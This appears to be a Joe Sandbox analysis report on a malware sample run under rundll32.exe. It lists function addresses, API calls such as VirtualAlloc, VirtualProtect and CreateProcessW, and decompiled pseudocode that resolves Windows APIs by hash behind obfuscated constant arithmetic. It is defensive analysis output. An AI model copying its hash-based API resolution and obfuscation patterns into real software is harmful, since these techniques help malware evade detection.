0x002bf21a
0x002bf223
0x002bf228
0x002bf22d
0x002bf234
0x002bf23b
0x002bf242
0x002bf24a
0x002bf24d
0x002bf254
0x002bf25b
0x002bf262
0x002bf269
0x002bf270
0x002bf274
0x002bf27b
0x002bf29a
0x002bf2a5
0x002bf2aa

APIs

CloseHandle.KERNEL32(3E7AD9F3), ref: 002BF2A5

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction ID: 5fca5fa1c73700668849cd63867b6766efa66ca5b921406d175478401414986e
Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction Fuzzy Hash: FE1126B6D0020CEBDF05CFE5C80A9DEBBB5FB14308F108589E915A6290D7B59B649F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002D8330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 002D8361
GetSystemMetrics.USER32(00000000), ref: 002D839D
GetSystemMetrics.USER32(00000001), ref: 002D83A8

Strings

DISPLAY, xrefs: 002D83C9
/}Au, xrefs: 002D839D, 002D83A8
GetMonitorInfo, xrefs: 002D8348

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: b416f9097df847eafed6a360a11b750f60535d24929183f592225b4d89402e37
Instruction ID: d1544887395a0b2ae4279773f404953af8d900fe18db2dd693fb12a1cc52d595
Opcode Fuzzy Hash: b416f9097df847eafed6a360a11b750f60535d24929183f592225b4d89402e37
Instruction Fuzzy Hash: 0211B1716227059FD7608F649C45BB7B7ECEB49B10F00856AFD4AD7340EBB0AC148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002D85AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 002D85E5
GetSystemMetrics.USER32(00000000), ref: 002D860A
GetSystemMetrics.USER32(00000001), ref: 002D8615

Strings

EnumDisplayMonitors, xrefs: 002D85C4
/}Au, xrefs: 002D860A, 002D8615

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 2c089492234e99a2b1043e8e4d51ce1f9c28dc46e3b70ba0ed5436595a152ee4
Instruction ID: b16f8be69095f47b4d3dab3a0093e62ef1f0cfa237f1e9728d64db3952193609
Opcode Fuzzy Hash: 2c089492234e99a2b1043e8e4d51ce1f9c28dc46e3b70ba0ed5436595a152ee4
Instruction Fuzzy Hash: 7C311BB2A1120AAFDB11DFA4CC45EEF77BCEB49310F044526E915D3240EB74EE248BA1

Uniqueness

Uniqueness Score: -1.00%

Function 002D8404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002D8471
GetSystemMetrics.USER32(00000001), ref: 002D847C

Strings

DISPLAY, xrefs: 002D849D
/}Au, xrefs: 002D8471, 002D847C
GetMonitorInfoA, xrefs: 002D841C

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 8de124795172595e4f7f5ccddd783c5796928b9d116e437c0d58bdcb0b94dd4d
Instruction ID: 77e892a5638410f793c076c830cb8e763cca2a14dcae1cd63d4a2accc4f0b684
Opcode Fuzzy Hash: 8de124795172595e4f7f5ccddd783c5796928b9d116e437c0d58bdcb0b94dd4d
Instruction Fuzzy Hash: 6111D0716257069FD720CFA49C45BA7B7ECEB09724F00852AED55DB340DBB0AC508BA1

Uniqueness

Uniqueness Score: -1.00%

Function 002D84D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002D8545
GetSystemMetrics.USER32(00000001), ref: 002D8550

Strings

GetMonitorInfoW, xrefs: 002D84F0
/}Au, xrefs: 002D8545, 002D8550
DISPLAY, xrefs: 002D8571

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: 41f7ae02f79cb117963919abfdd30faba578b86cfa6fd23721a8e54586c00e3a
Instruction ID: 8d658e817d626f961ef48ce4eedf851e0a63de959ae2f58a2eee67dc1fd59ac1
Opcode Fuzzy Hash: 41f7ae02f79cb117963919abfdd30faba578b86cfa6fd23721a8e54586c00e3a
Instruction Fuzzy Hash: AD11A971A217059FD720DFA4AC45BA7B7ECEB09710F45852BE949D7340DBB1AC148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002D8298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002D82E6
GetSystemMetrics.USER32(00000001), ref: 002D82F8

Strings

MonitorFromPoint, xrefs: 002D82AA
/}Au, xrefs: 002D82E6, 002D82F8

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: e6e61b7950cab4b415e768defa56ab0a7ebb3578bbd597524880e792f17ef373
Instruction ID: 0b65d6f621832e3ad3701a3006402e8aec6cb011ccf69a72257e02c487a31279
Opcode Fuzzy Hash: e6e61b7950cab4b415e768defa56ab0a7ebb3578bbd597524880e792f17ef373
Instruction Fuzzy Hash: C601D131A11309AFDB014F95DC45BDE7BADEB58B61F248066F908CB311CB70AC208BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002D8170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002D81C1
GetSystemMetrics.USER32(00000001), ref: 002D81CD

Strings

MonitorFromRect, xrefs: 002D8185
/}Au, xrefs: 002D81C1, 002D81CD

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: f58549cb7df88da8a7ce40bef07d94aade1d3addb0cd125939f6670aaf9bc0e0
Instruction ID: 1fe5d641c3ded85df639726a5c463d206487470633477d0d74bb165019f89bb3
Opcode Fuzzy Hash: f58549cb7df88da8a7ce40bef07d94aade1d3addb0cd125939f6670aaf9bc0e0
Instruction Fuzzy Hash: 4401A4312102169BD7109F99DC86B97B79DE7443A1F14C0A3ED08CB342DB71DC5A8BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00312B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00312B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00312BA9
DdeGetLastError.USER32(00000015), ref: 00312BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00312BCD

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 8a343c94d3e6da9045cf2ea3b790b39a6af3d96a0c331ec2eb09a0e5b0e98fb3
Instruction ID: 6d946ebe020fbb4bf16f70b41932a5322936feb12a5285be492d97087f66894b
Opcode Fuzzy Hash: 8a343c94d3e6da9045cf2ea3b790b39a6af3d96a0c331ec2eb09a0e5b0e98fb3
Instruction Fuzzy Hash: 642136742082409FDB49DF68C8C1EAA77E8AB4D310F158195F988CF2A6DB71E890CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00311428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 003114BF

Strings

01, xrefs: 00311607
`, xrefs: 00311498

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 01$`
API String ID: 701148680-2437783718
Opcode ID: acd1ac73a1d8e95cca524059ae8fd17c8b6d0227cd79b8a086e0733ed3264497
Instruction ID: a90507a7e28c2ed9bc6b681499f5165b981fce2f4a85a48c01999699cf2c6d8d
Opcode Fuzzy Hash: acd1ac73a1d8e95cca524059ae8fd17c8b6d0227cd79b8a086e0733ed3264497
Instruction Fuzzy Hash: AF516376A002199BCB1AEE5CD9859EEB3BAEB4C350F154020FE06DB744CA34DD91C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 002D80E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 002D8110

Strings

GetSystemMetrics, xrefs: 002D80F8
/}Au, xrefs: 002D80FD, 002D810A, 002D8110

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 1b42b847eed0ec040ffb9ee08e111106b3953c278339b01c999c2392bf630ce9
Instruction ID: 78605557c329b7021980074754acfc259bac1c737d85925ff6520ca8eaeabfde
Opcode Fuzzy Hash: 1b42b847eed0ec040ffb9ee08e111106b3953c278339b01c999c2392bf630ce9
Instruction Fuzzy Hash: D5F090301352425ADB504B7C9D85B62358EE746330F648B23E12D463D5CE79CC6E8654

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1468 Parent PID: 2184 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	0%
Total number of Nodes:	73
Total number of Limit Nodes:	5

Executed Functions

Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E

Strings

|lF, xrefs: 00463961
trty55345, xrefs: 004639BD

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|lF
API String ID: 2643768156-462011533
Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F

Uniqueness

Uniqueness Score: -1.00%

Function 004104C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004104C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00407378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 00410560

Strings

*S, xrefs: 00410522
5l, xrefs: 00410502
LZ, xrefs: 00410529

Memory Dump Source

Source File: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2339655082.0000000000420000.00000040.00020000.sdmp Download File
Associated: 0000000B.00000002.2339675921.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: 8a4a50fccc019cea45a05ef1885fd17a53ef087f713c54163174b183f339ab60
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: 2311F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B54CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686

Strings

Link, xrefs: 00461666

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E

Uniqueness

Uniqueness Score: -1.00%

Function 001DEB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001DEB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001DEDD9

Memory Dump Source

Source File: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: b148d44ab56b61b2bca518033b4ef3e6d81f2716129a530a4a85c7b1bde80d7b
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 9EC1A875A002099FCB48DF88C590EAEB7B6BF88305F248159E9099F355D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799

Uniqueness

Uniqueness Score: -1.00%

Function 00407F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00407F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00407378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00407FF7

Strings

ZHq, xrefs: 00407F6B

Memory Dump Source

Source File: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2339655082.0000000000420000.00000040.00020000.sdmp Download File
Associated: 0000000B.00000002.2339675921.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: d902e23f6411a0c44fb82a2e6a8296566946c79d4f08726a750a0587d667c915
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: EC110FB6C00219BBDF00DFA4C94A8DEBFB4EF04318F108589E92466241D3B95B14DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001DE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DE6A4

Strings

VirtualAlloc, xrefs: 001DE689, 001DE68C

Memory Dump Source

Source File: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: bc6b326a41a5d26bea6e29ba8bc052ecf4b9a8ac294c75c02919a97063cff55d
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 36113060D08289EAEF01D7E884097FEBFB55B21705F044098E5446B282D3BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041B86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E0041B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00407378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0041B942

Memory Dump Source

Source File: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2339655082.0000000000420000.00000040.00020000.sdmp Download File
Associated: 0000000B.00000002.2339675921.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: 356f3b95ddaaa167dd82075bba60e0d4b8753b8399a247414e87281e072a6ffd
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: 1121E672800248BBDF159F95CD09CDFBF79FF89714F008158FA1466160D7B69A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00412550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00407378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004047E4

Memory Dump Source

Source File: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2339655082.0000000000420000.00000040.00020000.sdmp Download File
Associated: 0000000B.00000002.2339675921.0000000000422000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: 65912959230b40fcbc033ffb5be77358307eff91cf09a66e6c6d15bb7c7ea9d8
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: 27210372D01208FBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00428361
GetSystemMetrics.USER32(00000000), ref: 0042839D
GetSystemMetrics.USER32(00000001), ref: 004283A8

Strings

/}Au, xrefs: 0042839D, 004283A8
GetMonitorInfo, xrefs: 00428348
DISPLAY, xrefs: 004283C9

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
GetSystemMetrics.USER32(00000000), ref: 0042860A
GetSystemMetrics.USER32(00000001), ref: 00428615

Strings

/}Au, xrefs: 0042860A, 00428615
EnumDisplayMonitors, xrefs: 004285C4

Memory Dump Source

Source File: 0000000B.00000002.2339686515.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

